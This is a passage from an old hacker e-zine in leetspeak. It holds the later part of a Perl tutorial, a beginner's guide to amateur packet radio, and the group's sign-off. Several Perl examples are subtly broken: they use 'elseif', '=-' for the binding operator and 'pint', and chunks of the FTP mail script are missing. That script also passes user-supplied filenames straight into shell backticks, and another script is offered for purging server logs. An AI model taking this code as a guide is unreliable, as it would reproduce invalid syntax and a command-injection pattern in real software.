is similar in syntax to C, but with the style of UNIX shell scripting. Along with that it contains all of the best features of every other programming language you've eva used (4nd y3s 1 kn0w 4ll j3w l4m3rs h4v3 n3v3r us3d 4ny pr0gr4mm1ng l4ngu4g3s b4, but j3w w1ll h4v3 t0 t4k3 my w0rd f0r 1t). Perl is an interpreted language rather than a compiled one (th4t m34ns th4t 34ch st4t3m3nt 1s tr4nsl4t3d 1nt0 s0urc3 c0de 0n3 4t 4 t1m3 4s 3x3cut10n pr0c33ds r4th3r th4n th3 3nt1re pr0gr4m 4ll 4t 0nc3 l1k3 4 c0mp1l3d 0n3), which can be either an advantage or a disadvantage whichever way you look at it. Perl has been ported to virtually every operating system out there, and most Perl programs will run un-modefied on any system that you move them to. This is definately an advantage. Its also very useful for all those trivial day-to-day tasks that you don't want to have to write in C and compile. The good thing about Perl is that its very forgiving as far as things like declaring variables, allocating and deallocating memory, and variable types, so you can actually get down to the business of writing the code. In fact, those concepts don't actually exist in Perl, this results in programs that are short and to the point, while similar programs writtn in C might spend half the code just declaring the variables. A Simple Perl Program --------------------- To get you started in the absolute basics of Perl programming, here is a very trivial Perl program: #!/usr/bin/perl print "the man from Del Monte, he say f41th 0wnz j3w\n"; Thats it, simple ain't it. Type that in, save it to a file called delmonte.pl, chmod +x it, and then execute it, simplicity itself. If by any chance you are familier with shell scripting languages (n0, 1m n0t t4lk1ng t0 j3w l4m3rs, 1 kn0w y0u d0n't c0d3), this will look very familier. Perl basically combines the simplicity of shell-scripting with the powah of a fully-fledged programming language. The first line of the program indicates to OS where to find the perl interpreter, this is standard procedure with shell scripts. If /usr/bin/perl is not the correct location for Perl on your system, you can find out where it is located by typing "which perl" at the command line. If j3w do not have Perl installed you might want to go to www.perl.com and get it. The second line does exactly what is says - it prints the text enclosed in the quotes. The \n is used for a new line character. Perl Variables and Data Structures ---------------------------------- Unlike most programming languages, Perl doesn't have the concept of data-type (integer, string, char, etc), but it does have several kinds of variable. Scalar variables, indicated as $variable, are interpreted as numbers or strings, as the context warrents. You can treat a variable as a number one moment and a string the next if the value of the variable makes sense in that context. There is a large collection of special variables in Perl, such as $_, $$ and $<, which Perl keeps track of, and you can use if you want to. ($_ is the default input variable, $$ is the process ID, and $< is the user ID). As you become more familier with Perl, you will probably find yourself using these variables, and people will accuse you of writing "read-only" code. Arrays, indicated as @array, contain one or more elements, which can be referred to by index. For example, $names[12] gives me the 13th element in the array @names. (its important to remember that numbering starts with 0). Associative arrays, indicated by %assoc_array, store values that can be referenced by key. For example, $days{Feb} will give me the element in the associative array %days that corresponds with Feb. The following line of Perl code lists all the elements in an associative array (the foreach construct will be covered later in the phile). foreach $key (keys %assoc){ print "$key = $assoc{$key}\n"}; NOTE: $_ is the "default" variable in Perl. In this example, the loop variable is $_ because none was specified. Conditional Statements: if/else ------------------------------- The syntax of a Perl if/else structure is as follows: if (condition) { statement(s) } elseif (condition) { statement(s) } else { statement(s) } condition can be any statement or comparison. If a statement returns any true value, the statement(s) will be executed. Here, true is defined as: o--> any nonzero number o--> any nonzero string; that is, any string that is not 0 or empty o--> any conditional that returns a true value. For example, the following piece of code uses the if/else structure: if ($favorite eq "d4rkcyde") { print "Yes, d4rkcyde 0wnz.\n" } elseif ($favourite eq "PLUK") { print "NO!, PLUK is l4m3 as sh1t.\n"; } else { print "Your favorite grewp is $favorite.\n" } Okay I can tell by now that your pretty impressed wif my uber el8 Perl tekniq and to be honest, I don't blame j3w one bit, now lets get on with some more in-depth topics. Looping ------- Perl has four looping constructs: for, foreach, while, and until. for --- The for construct performs a statement (or set of statements) for a set of conditions defined as follows: for (start condition; end condition; increment function) { statement(s) } At the beginning of the loop, the start condition is set. Each time the loop is executed, the increment function is performed until the end condition is achieved. This looks much like the traditional for/next loop. The following code is an example of a for loop: for ($i=1; $i<=10; $i++) { print "$i\n" } foreach ------- The foreach construct performs a statement (or set of statements) for each element in a set, such as a list or array: foreach $name (@names) { print "$name\n" } while ----- while performs a block of statements while a particular condition is true: while ($x<10) { print "$x\n"; $x++; } until ----- until is the exact opposite of the while statement. It will perform a block of statements while a particular condition is false - or, rather, it becomes true: until ($x>10) { print "$x\n"; $x++; } Regular Expressions ------------------- Perl's greatest strength is in its text and file manipulation. This is accomplished by using the regular expression (regex) library. Regexes allow complicated pattern matching and replacement to be done efficiently and easily. For example, the following one line of code will replace every ocurrence of the string 'eleet' or the string 'k-rad' with the string 'lame' in a line of text: $string =- s/eleet|k-rad/lame/gi; Without going into too much depth, the following table should explain what this line actually means: $string =- [ Performs this pattern match on the text found in the ] [ varibale called $string. ] s [ Substitute. ] / [ Begins the text to be matched. ] eleet|k-rad [ Matches the text eleet and k-rad. Something to ] [ to remember though is its looking for the text eleet ] [ and not the word eleet, so it will also match the ] [ text eleet in eleethax0r. ] / [ Ends text to be matched, begin text to replace it. ] lame [ Replaces anything that was matched with the text lame] / [ Ends replace text. ] g [ Does this substitution globally; that is, wherever in] [ the string you match the match text (and any number ] [ of times), replaces it. ] i [ The search text is case-insensitive. It will match ] [ eleet, Eleet, or ElEeT. ] ; [ Indicates the end of the line code. ] You might think that replacing a string of text with another is quite a simple task but the code needed to do that same thing in another language such as C, is mad big. Access to the Shell ------------------- Perl is very useful for admin functions because, for one thing, it has access to the shell. This means that any process that you might ordinarily do by typing commands to the shell, Perl can do for you. This is done with the `` syntax; for example, the following code will print a directory listing: $curr_dir = `pwd`; @listing = `ls -la`; pint "Listing for $curr_dir\n"; foreach $file (@listing) { print "$file"; } NOTE: the `` notation uses the backtick found above the tab key, not the single quote. Thought i'd mention that cos a few people don't even know it exists (j3w kn0w wh0 j3w 4r3). Access to the command line is pretty common in shell scripting languages but is less common in higher level programmning languages. Command-Line Mode ----------------- In addition to writing programs, Perl can be used from the command line like any other shell scripting language. This enables you to smack up Perl utilities on-the-fly, rather than having to create a file and execute it. For example, running the following command line will run through the file foo and replace every occurence of the string k-rad with el8, saving a back-up copy of the file at foo.bak: perl -p -i.bak -e s/k-rad/el8/g foo The -p switch causes Perl to perform the command for all files listed (in this case, just one file). The -i switch indicates that the file specified is to be edited in place, and the original backed up with the extension specified. If no extension is supplied, no backup copy is made. The -e switch indicates that what follows is one or more lines of a script. Automation Using Perl --------------------- Perl is great for automating some of the tasks involved in maintaining and administering a UNIX machine. Because of its text manipulation abilities and its access to the shell, Perl can be used to do any of the processes that you might ordinarily do by hand. The following sections are basically just examples of Perl programs that you might use in the daily maintenance of your box. Moving Files ------------ If for example you run a secure FTP site, then this is how it might work. Incoming files are placed in an "uploads" directory, when they have been checked, they are moved to a "private" directory for retrievel. Permissions are set in such a way that the file is not shown in a directory listing, but can be retrieved if the filename is known. The person who placed the file on the server is informed via e-mail that the file is now available for download. Seeing as directory listings aren't available it would be a good idea to make retrievel of the filename available in all-uppercase and all-lowercase as well as the original filename. The following Perl program is to perform all those tasks with a single command. When the file is determined as ready to go onto the FTP site, you only need to type: move filename user, where filename is the name of the file to be moved, and user is the e-mail addy of the person who uploaded it ie: person to be notified. 1: #!/usr/bin/perl 2: # 3: # Move a file from /uploads to /private 4: $file = @ARGV[0]; 5: $user = @ARGV[1]; 6: 7: if ($user eq "") {&usage} 8: else { 9: if (-e "/home/ftp/uploads/$file") 10: {`cp /home/ftp/uploads/$file /home/ftp/private/$file`; 11: chmod 0644, "/home/ftp/private/$file"; 12: `rm -f /home/ftp/uploads/$file`; 13: if (uc($file) ne $file) { 14: $ucfile = uc($file); 15: `ln /home/ftp/private/$file /home/ftp/private/$ucfile`; 16: } 17: if (lc($file) ne $file) { 18: $lcfile = lc($file); 19: `ln /home/ftp/private/$file /home/ftp/private/$lcfile`; 20: } 21: 22: # Send mail 23: open (MAIL, "| /usr/sbin/sendmail -t ftpadmin,$user"); 24: print MAIL < \n"; 47: print "where is the user that you are moving this for.\n\n"; 48: } NOTE: domain.com would be replaced with the domain associated with your box. Without going through the entire code line by line, the following paragraphs look at some of the points that demonstrate the powah and syntax of Perl. In lines 4-5, the array @ARGV contains all the command-line arguments. The place where one argument ends and another begins is taken to be every space, unless arguments are given in quotes. In line 9, the -e file tests for the existence of a file. If the file does not exist, perhaps the user gave the wrong filename, or one of the other server admins beat you to it. Perl enables you to open a pipe to some other process and print data to it. This allows Perl to *use* any other program that has an interactive user interface, such as sendmail, or an FTP session. Thats basically the purpose of line 23. The << syntax allows you to print multiple lines of text until the EOF string is encountered. This eliminates the necessity to have multiple print commands following one another, ie: 24: print MAIL < 7: ########### 8: $word=@ARGV[0]; 9: $file=@ARGV[1]; 10: 11: unless ($file) { 12: print "Usage: remove \n"; } 13: 14: else { 15: open (FILE, "$file"); 16: @lines=; 17: close FILE; 18: 19: # remove the offending lines 20: @lines = grep (!/$word/, @lines); 21: 22: # Write it back 23: open (NEWFILE, ">$file"); 24: for (@lines) { print NEWFILE } 25: close NEWFILE; 26: } # End else This listing is pretty self-explanatory. It reads in the file and then moves the lines that contain that string using Perl's grep command, which is similar to the standard UNIX grep. If you save this as a file called 'remove' and place it in your path, you will have a quick way to purge server logs of unwanted messages. Posting to Usenet ----------------- If you need to post to Usenet periodically, for example, to post a FAQ, the following program can automoate the process for you. In the following code, the text that is posted is read in from a text file, but you can modify it so that your input can come from anywhere. This program uses the Net::NNTP module, which is a standard part of the Perl distribution. 1: #!/usr/bin/perl 2: open (POST, "post.file"); 3: @post = ; 4: close POST; 5: use Net::NNTP; 6: 7: $NNTPhost = 'news'; 8: 9: $nntp = Net::NNTP->new($NNTPhost) 10: or die "Cannot contact $NNTPhost: $!"; 11: 12: # $nntp->debug(1); 13: $nntp->post() 14: or die "Could not post article: $!"; 15: $nntp->datasend("Newsgroups: news.announce\n"); 16: $nntp->datasend("Subject: FAQ - Frequently Asked Questions\n"); 17: $nntp->datasend("From: L4m3r \n"); 18: $nntp->datasend("\n\n"); 19: for (@post) { 20: $nntp->datasend($_); 21: } 22: 23: $nntp->quit; Shout Outs ---------- Thats it for this file, hope its of some help to all you uber hakkahs out there and I hope that you now realise (if you didn't before) the full potential of Perl. [hybr1d] [bodie] [JaSuN] [fORCE] [mranon] [shadow-x] [exstriad] [sonicborg] [qubik] [downtime] [dialt0ne] [elf] [n1no] [sintax] [xio] [psyclone] [knight] big up to the d4rkcyde crew K33p 1t r34l, P34c3 -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ Packet Radio ]:::::[OO--[ by JaSuN ]---[ jasun@phreaker.net ]:::::: -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: --oOo--> Packet Radio - Beginners Guide ]------------------ --oOo--> -------------------------------------------------- --oOo--> Main Document Introduction ]--- --oOo--> Amateur Radio Network Introduction ]--- --oOo--> Amateur Radio Packet Network ]--- --oOo--> What Is Communication? ]--- --oOo--> What Is Data Communication? ]--- --oOo--> Introduction to Packet Radio ]--- --oOo--> --* What Is Packet Radio & What Are Its Uses? ]--- --oOo--> --* Hardware Required ]--- --oOo--> --* Packet Radio <-> Internet Communications ]--- --oOo--> --* Packet Radio User Groups ]--- --oOo--> --* Software Required ]--- --oOo--> Radio Amateur Examination ]--- --oOo--> Legal Issues ]--- --oOo--> Glossary Of Terms ]--- --oOo--> Further Reading ]--- --oOo--> Conclusion ]--- --oOo--> Disclaimer ]--- --OoO--> ============================================= ]--- Main Document Introduction: =========================== In this article I will cover some aspects about the different data communication systems that are in use today on the Amateur Radio Network. This article will mainly talk about Packet Radio, but I will write future ones on the other data modes that are also in use and a more in depth one about Packet Radio, talking more about the hardware, how to wire everything up and frequencies used. This is basically a beginners guide, for people that don't know anything about Packet/Amateur and want to get into it. Amateur Radio Network Introduction: =================================== Hopefully by the end of this document, you will understand a little more about how it all works and what is currently in widespread use/being implemented. I will discuss the main topics so you could then get yourself set-up with a station, provided you wanted to and passed the Radio Amateur Examination test. See the end of this article for further details about the exam/licence. Amateur Radio Packet Network: ============================= This section will give you the information needed to communicate on the ever increasing Packet Radio Network. It will provide information on the required hardware equipment, software and also the actual technical side behind the protocols frequently used. It will cover the basics, and then hopefully cover some of the more detailed and experimental ideas/trials of new things that are currently being tested, as well as some good resource sites across the Internet. What Is Communication?: ======================= Have you ever stopped for a period of time and wondered what it would be like without all of the common communications methods that we use and take for granted today? What would we do without a Telephone, the Internet or Television? Most of us would be lost without these things, maybe we could manage but it would sure be more difficult. Whoever you are, whatever you do, the chances are you use/enjoy/need one of the above. All of us communicate in one way or another, those things just make it easier. What Is Data Communication?: ============================ Most of you will have some idea about what data communication is and how it can be used in a large number of ways. However, it would probably surprise you about the number of people that don't have any idea at all. If you are slightly interested in computers, the Internet or Telecommunications, then you will know something, probably even something that the next person does not. Communications in itself, is about sharing information and using it to our best advantage. There is the general category of Data Communications, but these can be divided into smaller sub-categories, either way they will be: 1. Wireless Communications 2. Landline Communications These can then be further divided into sub-categories, listed below are a few examples: 1. Telecommunications 2. Amateur Radio 3. Internet All of those are large networks, which make our life of communications a lot easier, but not forgetting a lot more enjoyable. What Is Packet Radio & What Can It Be Used For? =============================================== Packet Radio is a means of transfer data over wireless links across varying distances. It can be used for all kinds of different applications and being it's main use in the Amateur Radio hobby, there is constantly all kinds of new ideas are being tested out and implemented not only on the software side, but also on the hardware side of things, as development of new Packet Radio TNC'S are being developed commercially and by knowledgeable amateurs. Some of the main uses today are Converse, sending private messages though the BBS Network, lond distance (DX) contacts and much more. Hardware Required: ================== To be able to use Packet Radio you will need a number of Hardware items, as well as the Software. You will need a Transceiver, TNC, antenna, power supply, computer and software. It is possible to operate a station automatically without the use of a computer, by using the TNC alone. However, you will still need a computer to configure it and the software and to see what is happening on the air. The hardware can be expensive, depending on what it is. If you are operating on CB, it will cost a lot less, as CB equipment is a lot cheaper to buy. If you want to operate on Amateur Radio, it will cost more, but there is a lot more to explore and expand on. Packet Radio <-> Internet Communications: ========================================= There are a number of Packet <-> Internet links now available that offer different advantages and services, depending on what they were intended for. Some links are in place to connect the Converse Network, which is like Internet Relay Chat (IRC) but over Packet Radio. The links feed the data off into the Internet, which then appears on the Packet Network in another country. By using the Internet, it not only speeds up the Converse Network, but it also forms a backup if any of the hard Packet Links happen to fail. By using the Internet as an international link, it allows Packet users from different countries to talk to each other, as if it were only over Packet, the link could be easily lost if a few links were to loose connection with each other. There are also many more services that are available to Packet users, such as SMTP/NNTP mail, telnet and more. It has to be restricted, so that no unauthorised users can access the Packet Network from the Internet without being licensed. The class of IP's 44.*.*.* has been allocated to the Amateur Packet Radio Network (AMPR). The use of IP over the Packet Network is slowly increasing, because it has its advantages over the old systems. It is also possible to play games such as Quake over a fast Packet link, anything above 9k6 will be okay to play. Even though it might be a little slow it does work. It would also need to be a Duplex link. One thing about that though is that you probably would not be able to do it for extended periods of time because of the transmitter, it would eventually overheat and could damage the transceiver. Packet Radio User Groups ======================== Most development across the network is due to the implementation of user groups that cover the whole of the United Kingdom and also across the world. As the network is so large, for any major changes to be implemented, the Amateur Radio hobby has devoted organisations such as the RSGB (Radio Society Of Great Britain) to help with not only Packet Radio related issues, but the whole hobby in general. It may be referred to as "amateur" but in actual fact, a large portion of the hobby and in the data communications areas in particular, have a lot of "experts" that work in the industry everyday and input their knowledge. Software Required: ================== A lot of Software is available to get going on Packet. As a user, you will simply need one of the many clients available, most of which are available for a number of operating systems. If you were running a BBS, the most commonly used server Software is FBB which is available for Linux, Windows and DOS. Radio Amateurs Examination ========================== The RAE is an exam issued by City & Guilds, which will give you a qualification and also allow you to get a valid licence/callsign to legally use the allotted Amateur Radio frequencies. Usually, you would buy one of the books that detail what is contained within the exam, then either go though it on your own or goto lessons. Then you go and take the exam when you think you are ready, although the exams are held usually at colleges/clubs about twice a year, usually in May and November. The exam is multiple choice and is really just based on common sense, what is detailed in some of the exam books you do not need to know deeply, just a slight knowledge will suffice. You will probably forget it later on, unless you actually are interested in any of it and continue to use the information/techniques in actual practice. Legal Issues ============ At this point I must stress that to legally use the dedicated Amateur Bands for anything at all, be it voice/data, you must hold a valid Amateur Radio Licence. The users will report any unauthorised use to the Radio Communications Agency (part of the Department Of Trade And Industry) and you will get traced if you continue. I would suggest that if you would like to try anything out, join a club first, or visit one and see what it is all about. Also, you could try using Packet/other data modes on the Citizens Band radio on 27mhz, although illegal to use Packet Radio on the CB bands in the UK even with a valid CB licence, to be honest anything goes when it relates to CB, as far as today's users are concerned. You will have much more to explore if you decide to move into the Amateur Bands and it is much more organised and established. Although in other countries, such as Germany, CB Packet Radio is also widespread, CB Packet Radio is only illegal in the UK now. Glossary Of Terms: ================== There are too many terms to list here, so I will just list a few common ones that also apply to information contained within this document. There are a number of good resources on the Internet that list all of them you will need to know. AFSK: Audio Frequency-Shift Keying is a method of digital modulation. It is a good way of sending digital information over radiowaves. This method is in use by both Packet Radio modems and Telephone modems. A zero (0) is sent using one tone and a one (1) is sent using a different tone. AX.25: The protocol used on the Packet Radio Network for the transmission of data. This protocol borrows the link layer from X.25 (aka LAPB) modifies it and then adds a datagram address/routing header on the front. The envelope contains the callsign of the originating station, the callsign of the target station, addressing, control and error checking and synchronising. BBS: A Bulletin Board System is used for storing and sending bulletins across the network for users, forwarding private individual messages to the correct home BBS for whichever user the message is for, also allowing users to connect to stations which they cannot reach directly by using the BBS node and many others afterwards if needed. You can also use the BBS to Digipete if that option is available on the BBS in question. BPQ: BPQ is the most common Network Node/Packet Switch Software you will find that controls Nodes. As it is the most common and widely used, they are all compatible with each other and work much better with less initial problems. PMS: A Personal Mailbox System is usually built into a TNC and used for storing private messages to the Sysop of that station. They can be used for more, e.g. storing bulletins etc, but this is where the BBS stations come into play. TNC: Terminal Node Controller is a piece of hardware (the modem) which encodes/decodes data packets and talks to the software to display the information on your monitor. A TNC is self-maintaining and can be left acting as a Network Node/Digipeter without the need for anything other than the radio set-up. It can also have a built in PMS for storing of messages. The TNC also provides error detection as it assembles/disassembles the data packets. Further Reading: ================ http://www.packetradio.com - Good site, dedicated to Packet Radio http://members.xoom.com/ukpg - United Kingdom Packet Group (Now international) http://www.rsgb.org - Radio Society Of Great Britain Conclusion ========== I hope that you enjoyed reading this article and that you actually learned some new information from it. Even if you are not really interested in wireless data communications or Packet Radio in general, you may still have found something in here that you never knew before reading it. If you have any comments or suggestions about this article, please feel free to send me an email to: jasun@phreaker.net I hope this gave you a little insight into Packet. Look out for more articles from me in the future. I have made this information as accurate as possible to my knowledge, but don't complain if I made an error, most of this was written at times around 4am in the morning. Disclaimer: =========== This document is for educational *INTERNAL USE ONLY* It is for educational purposes only, the information contained within it must not be used to cause damage to any person/system. What you do with this information is your business, but anything that arises from its misuse cannot be held against anybody, apart from yourself. -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->[OO]:::::::::::::::[ Outness ]:::::::::::::::::::::::::::::::::::::::::::: -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: There ya have it, another quality issue of f41th brought to you by the D4RKCYDE collective [ http://darkcyde.system7.org ] Keep reading, and remember.. h4x0r1ng just 41nt d4 s4m3 w1th0ut pr0-plus c4ff3n3 p1llz. WERD to everyone in #darkcyde, and everyone that helps with f41th, you own. Bow Down. ----------------------------------------------------------------------------- ############# ################ ############### ############# ################ ############### ##### ##### ##### ###### ##### ##### ##### ###### ############# ##### ##### ############## ############# ##### ##### ############## ##### ##### ##### ###### ##### ##### ##### ###### ############## ################ ###### ############## ################ ###### [ D 4 R K C Y D E ] [ ] [ http://darkcyde.system7.org http://hybrid.DTMF.org ] [ #darkcyde EFNET (no lamerz) ] '...find us on the PSTN b1tch...'